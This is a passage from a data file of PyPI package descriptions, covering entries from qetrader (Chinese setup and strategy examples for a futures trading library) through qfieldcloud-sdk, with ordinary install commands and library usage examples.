\u7136\u540e\uff0c\u5c31\u53ef\u4ee5\u6309\u7167\u5982\u4e0b\u6b65\u9aa4\u5b89\u88c5\u4e86\u3002windows\u73af\u5883\u5b89\u88c5Microsoft C++ Build Tools\u4e0b\u8f7d\u94fe\u63a5\uff1a\u6ce8\uff1a\u8be5\u5de5\u5177\u7248\u672c\u53f7\u9700\u8981\u572814\u4ee5\u4e0a\u5b89\u88c5Redis-server\u6570\u636e\u5e93\u670d\u52a1\u5bbd\u6613\u63d0\u4f9b\u4e86\u5c0f\u5de5\u5177InstallRedis.exe\u65b9\u4fbf\u5b89\u88c5\u914d\u5957\u7684redis-server\u670d\u52a1\u3002\u4e0b\u8f7d\u94fe\u63a5\uff1a\u4e0b\u8f7d\u540e\u8fd0\u884c\u8be5\u5de5\u5177\u5373\u53efqetrader\u4f7f\u7528\u7684Redis\u7aef\u53e3\u53f7\u662f6379\u3002\u82e5\u9700\u8981\u4fee\u6539\u4e3a\u5176\u4ed6\u7aef\u53e3\u53f7\uff0c\u9700\u8981\u5728qetrader\u5b89\u88c5\u5b8c\u6bd5\u540e\u4fee\u6539qetrader\u7684\u914d\u7f6e\u5b89\u88c5qetraderpipinstall-Uqetrader--timeout=60\u6ce8\uff1a \u82e5\u8981\u52a0\u5feb\u5b89\u88c5\u901f\u5ea6\uff0c\u53ef\u4ee5\u4f7f\u7528\u56fd\u5185\u955c\u50cf\u7ad9\u70b9linux\u73af\u5883\u914d\u7f6e\u5b89\u88c5Redislinux\u4e0b\u5b89\u88c5Redis\u6700\u7b80\u5355\u5feb\u6377\u7684\u65b9\u5f0f\u662f\u4f7f\u7528Docker\u5b89\u88c5\u9996\u5148\u7528docker pull \u4e0b\u8f7dredis\u6700\u65b0\u7248\u672csudo docker pull redis\u7136\u540e\u542f\u52a8redis\u5bb9\u5668sudo docker run -itd --name redis-server -p 6379:6379 redis\u5b89\u88c5qetraderpipinstall-Uqetrader--timeout=60\u6ce8\uff1a 
\u82e5\u8981\u52a0\u5feb\u5b89\u88c5\u901f\u5ea6\uff0c\u53ef\u4ee5\u4f7f\u7528\u56fd\u5185\u955c\u50cf\u7ad9\u70b9\u4f7f\u7528\u8bf4\u660e\u542f\u52a8\u7f51\u9875\u670d\u52a1\u5199\u4e00\u4e2apython\u6587\u4ef6\u547d\u540d\u4e3arunWeb.pyfromqetrader.qewebimportrunWebpagerunWebpage()\u5728Anaconda\u7684\u547d\u4ee4\u884c\u73af\u5883\u4e0b\u8fdb\u5165runWeb.py\u6240\u5728\u76ee\u5f55\uff0c\u5e76\u8fd0\u884c\u5982\u4e0b\u547d\u4ee4pythonrunWeb.py\u8fd0\u884c\u540eweb\u7f51\u9875\u670d\u52a1\u5c06\u542f\u52a8\uff0c\u7528\u6237\u53ef\u4ee5\u5b9e\u65f6\u67e5\u770b\u8ba2\u5355\u59d4\u6258\uff0c\u6210\u4ea4\uff0c\u6301\u4ed3\uff0c\u6743\u76ca\u548c\u65e5\u5fd7\u4fe1\u606f\uff0c\u5e76\u53ef\u4ee5\u89c2\u5bdf\u884c\u60c5\u56fe\u3002\u6309\u952eCtrl+C\u6216\u8005\u5173\u95ed\u7a97\u53e3\u53ef\u4ee5\u7ec8\u6b62\u8be5\u670d\u52a1\uff0c\u7f51\u9875\u5c06\u65e0\u6cd5\u67e5\u770b\uff0c\u91cd\u65b0\u8fd0\u884c\u4e0a\u8ff0\u547d\u4ee4\u540e\u53ef\u6062\u590d\u3002\u7f16\u5199\u7b56\u7565\u6587\u4ef6\u5e76\u8fd0\u884c\u5982\u4e0b\u662f\u4e00\u4e2apython\u7b56\u7565\u6587\u4ef6\u8303\u4f8bimportqesdkfromdatetimeimportdatetime,timedeltafromqetraderimport*qesdk.auth('Your username','Your authcode')user_setting={'investorid':'000000','password':'XXXXXXXXXXXXXX','broker':'simnow'}user='myname'defgetLastToken(user):acclist=listSimuAccounts(user)iflen(acclist)>0:returnacclist[-1]else:returncreateSimuAccount(user,initCap=10000000)classmystrat(qeStratBase):def__init__(self):self.instid=['AG2306.SFE']self.datamode='minute'self.freq=1defcrossDay(self,context):passdefonBar(self,context):print(get_bar(context,1))defhandleData(self,context):passif__name__=='__main__':strat1=mystrat()token_code=getLastToken(user)runStrat(user,'real',[strat1],simu_token=token_code,real_account=user_setting)\u6ce8\uff1a1.auth\u8bed\u53e5\u4e2d\u6388\u6743\u7801\u9700\u8981\u5728https://quantease.cn\u4e0a\u6ce8\u518c\u767b\u5f55\u540e\u70b9\u51fb\u4e3b\u9875\u53f3\u4e0a\u89d2\u83dc\u5355'\u6388\u6743\u7801'\u83b7\u53d6\u30022.user_setting\u4e2d\u8d26\u6237\u4fe1\u606f\u9700\u8981\u6362\u6210\u60a8\u81ea\u5df1\u7684\u8d26\u6237\u4fe1\u606f3.\u8fd0\u884c\u540e\u590d\u5236\u7ed9\u51fa\u7684\u7f51\u9875\u94fe\u63a5\u5728\u6d4f\u89c8\u5668\u4e2d\u67e5\u770b\u8fd0\u884c\u7ed3\u679c\u5373\u53ef\u4fee\u6539\u7cfb\u7edf\u914d\u7f6e\u83b7\u53d6\u7cfb\u7edf\u914d\u7f6efromqetraderimportread_sysconfigread_sysconfig()\u83b7\u53d6\u7ed3\u679c\u4e3a{'redis': {'host': '127.0.0.1', 'port': 6379, 'password': ''}, 'webpage': {'host': '127.0.0.1', 'port': 5814}}\u4fee\u6539Redis\u914d\u7f6e\u63a5\u53e3\u51fd\u6570\u4e3asetRedisConfig(host='127.0.0.1',port=6379,password='')\u6839\u636e\u60a8\u672c\u5730Redis-server\u914d\u7f6e\u4fee\u6539\u8be5\u63a5\u53e3\uff0c\u4f7f\u5f97qetrader\u53ef\u4ee5\u8bbf\u95ee\u60a8\u7684\u672c\u5730\u6570\u636e\u5e93\u3002\u6bd4\u5982\u60a8\u672c\u5730Redis\u7aef\u53e3\u53f7\u4e3a6380\uff0c 
\u90a3\u4e48\u53ef\u4ee5\u8fd9\u4e48\u8fd0\u884cfromqetraderimportsetRedisConfigsetRedisConfig(port=6380)\u6062\u590d\u9ed8\u8ba4\u51fa\u5382\u8bbe\u7f6e\u4ec5\u9700\u8981\u8c03\u7528\u4e0d\u5e26\u53c2\u6570\u7684setRedisConfig\u5373\u53effromqetraderimportsetRedisConfigsetRedisConfig()\u4fee\u6539\u7f51\u9875\u914d\u7f6e\u63a5\u53e3\u51fd\u6570\u4e3asetWebConfig(host='127.0.0.1',port=5814)\u5982\u679cqetrader\u7f51\u9875\u670d\u52a1\u9ed8\u8ba4\u7aef\u53e3\u53f75814\u548c\u60a8\u672c\u5730\u7aef\u53e3\u51b2\u7a81\uff0c\u60a8\u53ef\u4ee5\u4fee\u6539\u4e3a\u5176\u4ed6\u7aef\u53e3\u53f7\uff0c\u6bd4\u5982\u4fee\u6539\u4e3a5008\u3002fromqetraderimportsetWebConfigsetWebConfig(port=5008)\u6062\u590d\u9ed8\u8ba4\u51fa\u5382\u8bbe\u7f6e\u4ec5\u9700\u8981\u8c03\u7528\u4e0d\u5e26\u53c2\u6570\u7684setWebConfig\u5373\u53effrom qetrader import setWebConfig\nsetWebConfig()\u5728\u6d4f\u89c8\u5668\u6d4b\u8bd5\u4e00\u4e0b\u8f93\u5165\u7f51\u5740http://127.0.0.1:5814, \u51fa\u73b0\u5982\u4e0b\u6587\u5b57\u4ee3\u8868\u542f\u52a8\u6210\u529fqetrader\u7f51\u9875\u5c55\u793a\u670d\u52a1\u5df2\u7ecf\u6210\u529f\u542f\u52a8\u5982\u4f55\u7f16\u5199\u7b56\u7565\u200b\t\u8bf7\u53c2\u7167\u5b98\u65b9\u6587\u6863\u6587\u6863\u8bf4\u660e\u63d2\u4ef6\u4f7f\u7528\u8bf4\u660e\u5b89\u88c5\u4ee5\u201calgoex\u201c\u63d2\u4ef6\u4e3a\u4f8b\uff0c\u4e0b\u8f7d\u63d2\u4ef6\u4ee3\u7801\u5982\u4e0b\uff1afromqesdkimportauthauth('your username','your authcode')fromqetrader.qepluginsimportinstallPlugininstallPlugin('algoex')\u8fd0\u884c\u4ee3\u7801\u540e\uff0c\u51fa\u73b0\u5982\u4e0b\u63d0\u793a\u4ee3\u8868\u5b89\u88c5\u6210\u529f\uff1a\u63d2\u4ef6algoex\u4e0b\u8f7d\u6210\u529f\n\u5728\u7b56\u7565\u6587\u4ef6\u4e2d\u6309\u5982\u4e0b\u683c\u5f0fimport\u8be5\u63d2\u4ef6:\nfrom qetrader.plugins.qealgoex import plugin_algoex\u6ce8;\u4e0b\u8f7d\u63d2\u4ef6\u9700\u8981\u6210\u4e3aVIP\u4ed8\u8d39\u5ba2\u6237\uff0c\u5426\u5219\u4f1a\u4e0b\u8f7d\u5931\u8d25\u3002\u6ce8\u518cVIP\u8bf7\u8054\u7cfb\u5ba2\u6237\u5f15\u7528\u63d2\u4ef6\u4ee5'algoex'\u4e3a\u4f8b\uff0c\u6839\u636e\u6309\u7167\u7684\u8bf4\u660e\uff0c\u5728code\u4e2d\u4f7f\u7528\uff1afromqesdkimportauth##\u6388\u6743\u7801auth('your username','your authcode')fromqetraderimportlistSimuAccounts,createSimuAccount,runStratfromqetrader.plugins.qealgoeximportplugin_algoex##\u5b9e\u76d8\u8d26\u6237\u4fe1\u606fuser_setting={'investorid':'xxxxxx','password':'xxxxxxxx','broker':'xxxxxx'}if__name__=='__main__':##\u6362\u6210\u81ea\u5df1\u7684\u7528\u6237\u540duser='myname'##\u5982\u679c\u6709\u6a21\u62df\u8d26\u6237\uff0c\u7528\u7b2c\u4e00\u4e2a\u8d26\u6237\uff0c\u6ca1\u6709\u65b0\u5efa\u4e00\u4e2atokenlist=listSimuAccounts(user)iflen(tokenlist)>0:token=tokenlist[0]else:token=createSimuAccount(user)##\u8fd0\u884c\u7b56\u7565\uff0calgoex\u63d2\u4ef6\u672c\u8eab\u5c31\u662f\u4e2a\u7b56\u7565\u5b9e\u4f8b\uff0c\u53ef\u4ee5\u76f4\u63a5\u4f7f\u7528runStrat(user,'real',[plugin_algoex],simu_token=token,real_account=user_setting)"} +{"package": "qet-tb-generator", "pacakge-description": "Allows to generate terminal blocks and connectors for QElectroTech electrical diagram software."} +{"package": "qeutil", "pacakge-description": "UNKNOWN"} +{"package": "qeventlog", "pacakge-description": "QEventLogcfgtool qeventlog write -f\narchitect partition \u2013module qeventlog.models"} +{"package": "qexpy", "pacakge-description": "QExPy (Queen\u2019s Experimental Physics) is a Python 3 package designed to facilitate data analysis in undergraduate physics laboratories. 
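As a quick taste of the error-propagation workflow described next, here is a minimal sketch; the Measurement(value, uncertainty) constructor and operator-based propagation are assumed here, so check the current QExPy documentation for the exact signatures:
# Minimal sketch: propagate measurement uncertainties through a calculation with QExPy.
import qexpy as q

length = q.Measurement(10.2, 0.1)   # a length reading of 10.2 +/- 0.1 (e.g. cm); assumed signature
width = q.Measurement(5.8, 0.1)     # a width reading of 5.8 +/- 0.1 (e.g. cm)

area = length * width               # arithmetic on Measurements propagates the errors
print(area)                         # shows the derived value together with its uncertainty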
The package contains a module to easily propagate errors in uncertainty calculations, and a module that provides an intuitive interface to plot and fit data. The package is designed to be efficient, correct, and to allow for a pedagogic introduction to error analysis. The package is extensively tested in the Jupyter Notebook environment to allow high quality reports to be generated directly from a browser."} +{"package": "qextract", "pacakge-description": "UNKNOWN"} +{"package": "qfa", "pacakge-description": "Quantum Finite AutomataThis library provides implementations of multiple quantum finite automata\nmodels.Implemented automata modelsPFA- Probabilistic Finite AutomatonMO1QFA- Measure-Once Quantum Finite AutomatonMM1QFA- Measure-Many Quantum Finite AutomatonGQFA- General Quantum Finite AutomatonHelper modulesLanguageChecker- used to check a language against an automaton using\nmultiple acceptance conditionsLanguageGenerator- generates language samples from regular expressionsPlotter- plots the results obtained from running a LanguageCheckerHereis the modules' overview in polish.CitationIf you have used our library and and would like to cite its usage, we please use the following BibTeX entry. Thanks!@article{lippa2020simulations,\n title={Simulations of Quantum Finite Automata.},\n author={Lippa, G and Makie{\\l}a, K and Kuta, M},\n journal={Computational Science--ICCS 2020},\n volume={12142},\n pages={441--450},\n year={2020}\n}"} +{"package": "qfaas", "pacakge-description": "qfaas-libqfaas-lib is a supporting library for QFaaS Serverless framework for Quantum Computing.InstallationInstall qfaas-lib with pip (Python >=3.10)pipinstallqfaasUsage/ExamplesfromqfaasimportBackend,RequestData,Utils#Definesdknamesdk=\"braket\"#Pre-processinginputdatadefpre_process(input):data=RequestData(input,sdk)returndata#Post-processingoutputdatadefpost_process(job):output=Utils.counts_post_process(job)returnoutputdefhandle(event,context):#1.Pre-processingrequestData=pre_process(event)#2.GenerateQuantumCircuitqc=generate_circuit(requestData.input)#3.VerifyandgetBackendinformationbackend=Backend(requestData,qc)#4.Submitjobandwaitupto1minforjobtocomplete.job=backend.submit_job(qc)#5.Post-processifjob.jobResult:job=post_process(job)response=Utils.generate_response(job)#6.SendbacktheresultreturnresponseAuthorsHoa NguyenDocumentationTBA"} +{"package": "qface", "pacakge-description": "Qt Interface Builder (QFace)QFace is a generator framework based on a common modern IDL. It is not a generator as such but enforces a common IDL format and provides a library to write your own generator. It is actually very easy to create your own generator and generate your custom solution based on your needs from the same IDL.The IDL is designed after the Qt/QML interface and as such is optimized to generate source code used with Qt C++ or Qt QML, but it is not limited to this use case.QFace is already very fast by design and suitable for large IDL document sets. Additionally it can use a cache to avoid parsing unchanged IDL documents. It can automatically avoid writing new files if the target file has the same content.QFace is written out of the learnings of using IDLs in other large projects. Often in the project you need to adjust the code generation but in many generators this is awfully complicated. Or you need to run a report on the documents or generate specific documentation. 
In QFace this is enabled by having a very flexible code generation framework which enforces the same IDL.Please see the INSTALL and USAGE guides for more information.DocumentationDocumentation is hosted atreadthedocs.InstallTo install the qface library you need to have python3 and pip installed.pip3installqfaceInstall Development VersionPrerequisitesTo install the development version you need to clone the repository and ensure you have checkout the develop branch.gitclonegit@github.com:Pelagicore/qface.gitcdqface\ngitcheckoutdevelopThe installation requires the python package manager called (pip) using the python 3 version. You can try:python3--version\npip3--versionInstallationUse the editable option of pip to install an editable version.cdqface\npip3install--editable.This reads thesetup.pydocument and installs the package as reference to this repository. So all changes will be immediatly reflected in the installation.To update the installation just simple pull from the git repository.DownloadIf you are looking for the examples and the builtin generators you need to download the code.gitclonegit@github.com:Pelagicore/qface.gitCopyright and licenseCopyright (C) 2016 Pelagicore AGThe source code in this repository is subject to the terms of the MIT license, please see included \"LICENSE\" file for details.QFace Example// echo.qfacemoduleorg.example1.0;/**!The echo interface to call someoneon the other side*/interfaceEcho{readonlyMessagelastMessage;voidecho(Messagemessage);signalcallMe();};structMessage{stringtext;};Now you write a small script using qface to generate your code# mygenerator.pyfromqface.generatorimportFileSystem,Generator# load the interface filessystem=FileSystem.parse('echo.qface')# prepare the generatorgenerator=Generator(searchpath='.')# iterate over the domain modelformoduleinsystem.modules:forinterfaceinmodule.interfaces:# prepare a context objectctx={'interface':interface}# use header.h template with ctx to write to a filegenerator.write('{{interface|lower}}.h','header.h',ctx)Depending on the used generator it reads the input file and runs it through the generator. The output files are written relative to the given output directory. The input can be either a file or a folder."} +{"package": "qface-qtcpp", "pacakge-description": "UNKNOWN"} +{"package": "qface-qtqml", "pacakge-description": "# qface-qtqmlThe reference QtQml generator for qface"} +{"package": "qface-qtro", "pacakge-description": "# QFace QtRemoteObjects GeneratorWork In ProgressThis generator tries to generate a complete micro service solution. It does so by\nreading the QFace IDL file and generating a client side plugin and a service\nfor each interface. Each module will be bundled into one server with an own\nservice registry where all interfaces from the module will be available.As a user you can simply import the QML generated plugin and ensure the server\nside generated stub is being implemented.The QML plugin will automatically connect to the server, which needs to run\nwhen the plugin is loaded.Each interface service is accessible using the fully qualified name. Different\nthan the REPC the models are also integrated into the service interface as\ndescribed via the QFace IDL.Open Issues:\n- Ideally the client side has a mean to start the server on demand.\n- What happens if the customer would like to have only one service registry for all\nmodules (e.g. 
the whole system)?"} +{"package": "qface-store", "pacakge-description": "UNKNOWN"} +{"package": "qfactor", "pacakge-description": "Quantum Fast Circuit Optimizer (Qfactor)This optimizer can optimize the distance between a circuit, a sequence of\nunitary gates, and a target unitary matrix. This optimizer uses an analytic\nmethod based on the SVD operation.InstallationThe best way to install this python package is with pip.pip install qfactorUsageThe qfactor package can be used to optimize a specified circuit.\nYou can specify your circuit with a list of Gate objects and pass them to\nthe optimize function. Seean example.CopyrightQuantum Fast Circuit Optimizer (qFactor) Copyright (c) 2020, The\nRegents of the University of California, through Lawrence Berkeley\nNational Laboratory (subject to receipt of any required approvals\nfrom the U.S. Dept. of Energy). All rights reserved.If you have questions about your rights to use or distribute this software,\nplease contact Berkeley Lab's Intellectual Property Office atIPO@lbl.gov.NOTICE. This Software was developed under funding from the U.S. Department\nof Energy and the U.S. Government consequently retains certain rights. As\nsuch, the U.S. Government has been granted for itself and others acting on\nits behalf a paid-up, nonexclusive, irrevocable, worldwide license in the\nSoftware to reproduce, distribute copies to the public, prepare derivative\nworks, and perform publicly and display publicly, and to permit others to do so."} +{"package": "qfast", "pacakge-description": "QFAST: Quantum Fast Approximate Synthesis ToolQFAST is a quantum synthesis tool designed to produce short circuits and to scale well in practice. QFAST uses a mathematical model of circuits encoding both gate placement and function. This is packaged together with a hierarchical stochastic gradient descent formulation that combines \u201ccoarse-grained\u201d fast optimization during circuit structure search with a better, but slower, stage only in the final circuit refinement.InstallationThe best way to install this python package is with pip.pip install qfastUsageQFAST can be used to convert a quantum operation specified by a unitary matrix into a circuit given byopenqasmcode. There is a command-line interface provided with qfast that can be accessed bypython -m qfast. This can be used to synthesize a matrix.python -m qfast input.unitary output.qasmHere theinput.unitaryfile is a NumPy matrix saved withnp.savetxt, the qasm output will be saved in theoutput.qasmfile and the KAK native tool will be used. The command-line help optionpython -m qfast -hcan be used for further information.QFAST can also be used as a library,an exampleis included.Native ToolsNative tools are necessary for QFAST to perform instantiation. During decomposition, the input unitary matrix is hierarchically broken into many smaller unitaries. At some level in the hierarchy, QFAST switches to instantiation, which uses a native synthesis tool to convert the small unitaries into native gates.Included with this python package is the QSearch native tool. Here are some others:qfast-qiskit: Several qiskit toolsqfast-uq: A UniversalQCompiler native tool (deprecated)qfast-qs: A QSearch native tool (Now default)ReferencesYounis, Ed, et al. 
\"QFAST: Quantum Synthesis Using a Hierarchical Continuous Circuit Space.\" arXiv preprint arXiv:2003.04462 (2020).CopyrightQuantum Fast Approximate Synthesis Tool (QFAST) Copyright (c) 2020,\nThe Regents of the University of California, through Lawrence Berkeley\nNational Laboratory (subject to receipt of any required approvals from\nthe U.S. Dept. of Energy). All rights reserved.If you have questions about your rights to use or distribute this software,\nplease contact Berkeley Lab's Intellectual Property Office atIPO@lbl.gov.NOTICE. This Software was developed under funding from the U.S. Department\nof Energy and the U.S. Government consequently retains certain rights. As\nsuch, the U.S. Government has been granted for itself and others acting on\nits behalf a paid-up, nonexclusive, irrevocable, worldwide license in the\nSoftware to reproduce, distribute copies to the public, prepare derivative\nworks, and perform publicly and display publicly, and to permit others to do so."} +{"package": "qfast-qiskit", "pacakge-description": "QFAST-QISKit: QISKit Plugin for QFASTQFAST-QISKit packages several QISKit tools forQFAST.\nThere are two native tools, KAKTool and QiskitTool, that are included.\nAlso, QiskitCombiner is a recombination tool that uses qiskit to\npiece together small circuits. The QiskitCombiner provides circuit optimization\nthat isn't available with the default NaiveCombiner.InstallationThe best way to install this python package is with pip.pip install qfast-qiskitCopyrightQuantum Fast Approximate Synthesis Tool (QFAST) Copyright (c) 2020,\nThe Regents of the University of California, through Lawrence Berkeley\nNational Laboratory (subject to receipt of any required approvals from\nthe U.S. Dept. of Energy). All rights reserved.If you have questions about your rights to use or distribute this software,\nplease contact Berkeley Lab's Intellectual Property Office atIPO@lbl.gov.NOTICE. This Software was developed under funding from the U.S. Department\nof Energy and the U.S. Government consequently retains certain rights. As\nsuch, the U.S. Government has been granted for itself and others acting on\nits behalf a paid-up, nonexclusive, irrevocable, worldwide license in the\nSoftware to reproduce, distribute copies to the public, prepare derivative\nworks, and perform publicly and display publicly, and to permit others to do so."} +{"package": "qfast-qs", "pacakge-description": "QFAST-QS: QSearch Plugin for QFASTQFAST-QS packages the SearchCompiler as a native tool plugin forQFAST. This package imports the QSearch Compiler which can be foundhereand its licensehere.InstallationThe best way to install this python package is with pip.pip install qfast-qsCopyrightQuantum Fast Approximate Synthesis Tool (QFAST) Copyright (c) 2020,\nThe Regents of the University of California, through Lawrence Berkeley\nNational Laboratory (subject to receipt of any required approvals from\nthe U.S. Dept. of Energy). All rights reserved.If you have questions about your rights to use or distribute this software,\nplease contact Berkeley Lab's Intellectual Property Office atIPO@lbl.gov.NOTICE. This Software was developed under funding from the U.S. Department\nof Energy and the U.S. Government consequently retains certain rights. As\nsuch, the U.S. 
Government has been granted for itself and others acting on\nits behalf a paid-up, nonexclusive, irrevocable, worldwide license in the\nSoftware to reproduce, distribute copies to the public, prepare derivative\nworks, and perform publicly and display publicly, and to permit others to do so."} +{"package": "qfast-sc", "pacakge-description": "QFAST-SC: SearchCompiler Plugin for QFASTQFAST-SC packages the SearchCompiler as a native tool plugin forQFAST. This package imports the SearchCompiler which can be foundhereand its licensehere.InstallationThe best way to install this python package is with pip.pip install qfast-scCopyrightQuantum Fast Approximate Synthesis Tool (QFAST) Copyright (c) 2020,\nThe Regents of the University of California, through Lawrence Berkeley\nNational Laboratory (subject to receipt of any required approvals from\nthe U.S. Dept. of Energy). All rights reserved.If you have questions about your rights to use or distribute this software,\nplease contact Berkeley Lab's Intellectual Property Office atIPO@lbl.gov.NOTICE. This Software was developed under funding from the U.S. Department\nof Energy and the U.S. Government consequently retains certain rights. As\nsuch, the U.S. Government has been granted for itself and others acting on\nits behalf a paid-up, nonexclusive, irrevocable, worldwide license in the\nSoftware to reproduce, distribute copies to the public, prepare derivative\nworks, and perform publicly and display publicly, and to permit others to do so."} +{"package": "qfast-uq", "pacakge-description": "QFAST-UQ: UniversalQ Compiler Plugin for QFASTQFAST-UQ packages the qiskit's implementation of isometry decomposition as a native tool plugin forQFAST.InstallationThe best way to install this python package is with pip.pip install qfast-uqCopyrightQuantum Fast Approximate Synthesis Tool (QFAST) Copyright (c) 2020,\nThe Regents of the University of California, through Lawrence Berkeley\nNational Laboratory (subject to receipt of any required approvals from\nthe U.S. Dept. of Energy). All rights reserved.If you have questions about your rights to use or distribute this software,\nplease contact Berkeley Lab's Intellectual Property Office atIPO@lbl.gov.NOTICE. This Software was developed under funding from the U.S. Department\nof Energy and the U.S. Government consequently retains certain rights. As\nsuch, the U.S. Government has been granted for itself and others acting on\nits behalf a paid-up, nonexclusive, irrevocable, worldwide license in the\nSoftware to reproduce, distribute copies to the public, prepare derivative\nworks, and perform publicly and display publicly, and to permit others to do so."} +{"package": "qfathom", "pacakge-description": "UNKNOWN"} +{"package": "qfc", "pacakge-description": "QFC - Quantized Fourier Compression of Timeseries Data with Application to ElectrophysiologyOverviewWith the increasing sizes of data for extracellular electrophysiology, it is crucial to develop efficient methods for compressing multi-channel time series data. While lossless methods are desirable for perfectly preserving the original signal, the compression ratios for these methods usually range only from 2-4x. What is needed are ratios on the order of 10-30x, leading us to consider lossy methods.Here, we introduce a simple lossy compression method, inspired by the Discrete Cosine Transform (DCT) and the quantization steps of JPEG compression for images. 
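To make the quantization idea concrete before the algorithm outline that follows, here is a tiny standalone NumPy sketch of the scale-round-rescale step; it is illustrative only, does not use the qfc functions shown later in this description, and the normalization factor value is an arbitrary assumption.

import numpy as np

rng = np.random.default_rng(0)
coeffs = rng.normal(size=8)        # stand-in for Fourier coefficients
factor = 4.0                       # assumed normalization factor

quantized = np.round(coeffs * factor).astype(np.int16)  # low-entropy integers, cheap to compress
recovered = quantized / factor                          # lossy reconstruction

print(np.abs(coeffs - recovered).max())  # error bounded by about 0.5 / factor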
The method comprises the following steps:Compute the Discrete Fourier Transform (DFT) of the time series data in the time domain.Quantize the Fourier coefficients to achieve a target entropy (the entropy determines the theoretically achievable compression ratio). This is done by multiplying by a normalization factor and then rounding to the nearest integer.Compress the reduced-entropy quantized Fourier coefficients using ZLIB (other methods could also be used).To decompress:Unzip the quantized Fourier coefficients.Divide by the normalization factor.Compute the Inverse Discrete Fourier Transform (IDFT) to obtain the reconstructed time series data.This method is particularly well-suited for data that has been bandpass-filtered, as the suppressed Fourier coefficients yield an especially low entropy of the quantized signal.For a comparison of various lossy and lossless compression schemes, seeCompression strategies for large-scale electrophysiology data, Buccino et al..For application to real data,see this notebook.InstallationpipinstallqfcUsage# See the examples directoryfrommatplotlibimportpyplotaspltimportnumpyasnpfromqfcimportqfc_compress,qfc_decompress,qfc_estimate_normalization_factordefmain():sampling_frequency=30000y=np.random.randn(5000,10)*50y=lowpass_filter(y,sampling_frequency,6000)y=y.astype(np.int16)target_compression_ratio=15############################################################normalization_factor=qfc_estimate_normalization_factor(y,target_compression_ratio=target_compression_ratio)compressed_bytes=qfc_compress(y,normalization_factor=normalization_factor)y_decompressed=qfc_decompress(compressed_bytes,normalization_factor=normalization_factor,original_shape=y.shape)############################################################y_resid=y-y_decompressedoriginal_size=y.nbytescompressed_size=len(compressed_bytes)compression_ratio=original_size/compressed_sizeprint(f\"Original size:{original_size}bytes\")print(f\"Compressed size:{compressed_size}bytes\")print(f'Target compression ratio:{target_compression_ratio}')print(f\"Actual compression ratio:{compression_ratio}\")print(f'Std. dev. of residual:{np.std(y_resid):.2f}')xgrid=np.arange(y.shape[0])/sampling_frequencych=3# select a channel to plotplt.figure()plt.plot(xgrid,y[:,ch],label=\"Original\")plt.plot(xgrid,y_decompressed[:,ch],label=\"Decompressed\")plt.plot(xgrid,y_resid[:,ch],label=\"Residual\")plt.xlabel(\"Time\")plt.title(f'QFC compression ratio:{compression_ratio:.2f}')plt.legend()plt.show()deflowpass_filter(input_array,sampling_frequency,cutoff_frequency):F=np.fft.fft(input_array,axis=0)N=input_array.shape[0]freqs=np.fft.fftfreq(N,d=1/sampling_frequency)sigma=cutoff_frequency/3window=np.exp(-np.square(freqs)/(2*sigma**2))F_filtered=F*window[:,None]filtered_array=np.fft.ifft(F_filtered,axis=0)returnnp.real(filtered_array)if__name__==\"__main__\":main()LicenseThis code is provided under the Apache License, Version 2.0.AuthorJeremy Magland, Center for Computational Mathematics, Flatiron Institute"} +{"package": "qf-common", "pacakge-description": "No description available on PyPI."} +{"package": "qf-diamond-norm", "pacakge-description": "QuantumFlow Diamond NormGavin E. Crooks (2020)SourceCalculation of the diamond norm between two completely positive trace-preserving (CPTP) superoperators, using\ntheQuantumFlowpackageThe calculation uses the simplified semidefinite program of WatrousarXiv:0901.4709[J. Watrous,Theory of Computing 5, 11, pp. 217-238\n(2009)]Kudos: Based on MatLab code written byMarcus P. 
da SilvaInstallationNote: Diamond norm requires that the \"cvxpy\" package (and dependencies) be fully installed. Installing cvxpy via pip\ndoes not correctly install all the necessary packages.$ conda install -c conda-forge cvxpy\n$ git clone https://github.com/gecrooks/qf_diamond_norm.git\n$ cd qf_diamond_norm\n$ pip install -e .Example> import quantumflow as qf\n > from qf_diamond_norm import diamond_norm\n > chan0 = qf.random_channel([0, 1, 2]) # 3-qubit channel\n > chan1 = qf.random_channel([0, 1, 2])\n > dn = diamond_norm(chan0, chan1)\n > print(dn)"} +{"package": "qfe", "pacakge-description": "QFE"} +{"package": "qff", "pacakge-description": "QFF: Quantize Financial FrameworkQFFis a Python package of quantitative financial framework, which is used to provide a localized backtesting and simulation trading environment for individuals, so that users can focus more on trading strategy writing.Main FeaturesHere are just a few of the things that QFF does well:Provide one-stop solutions such as data crawling, data cleaning, data storage, strategy writing, strategy analysis, strategy backtest and simulated trade.Provide graceful interface for strategy writing (similar to JoinQuant), facilitate users to get started quickly.Provide a local running environment to improve the strategy running efficiency.Provide rich interfaces to obtain free stock data, such as fundamental data, real-time and historical market data etc.Provide practical auxiliary functions to simplify strategy writing, such as indicator calculation, trading system framework, etc.InstallationSource codeThe source code is currently hosted on GitHub at:https://github.com/haijiangxu/qffGeneralpipinstallqff--upgradeChinapipinstallqff-ihttp://mirrors.aliyun.com/pypi/simple/--upgradeDockerDocker image for the QFF is athttps://hub.docker.com/r/haijiangxu/qff.pull docker imagedockerpullqffrun docker imagedockerrun-d-v/root/xxxx:/root/work-p8765:8765qffDocumentDocumentation for the latest Current release is athttps://qff.readthedocs.io/zh_CN/latest/.ContributionQFF is still under developing, feel free to open issues and pull requests:Report or fix bugsRequire or publish interfaceWrite or fix documentationAdd test casesStatementQFF only supports stocks, but not other financial products such as futures, funds, foreign exchange, bonds, cryptocurrencies, etc.All data provided by QFF is just for academic research purpose.The data provided by QFF is for reference only and does not constitute any investment proposal.Any investor based on QFF research should pay more attention to data risk.QFF will insist on providing open-source financial data.Based on some uncontrollable factors, some data interfaces in QFF may be removed.Please follow the relevant open-source protocol used by QFF.AcknowledgementSpecial thanksQUANTAXISfor the opportunity of learning from the project;Special thanksAKSharefor the opportunity of learning from the project;Special thanksJoinQuantfor the opportunity of learning from the project;"} +{"package": "qfieldcloud-sdk", "pacakge-description": "The official QFieldCloud SDK and CLIqfieldcloud-sdkis the official client to connect to QFieldCloud API either as a python module, or directly from the command line.ContentsInstallationCLI usageModule usageInstallLinux/macOSpip3 install qfieldcloud-sdkWindowsInstall Python with your favorite package manager. 
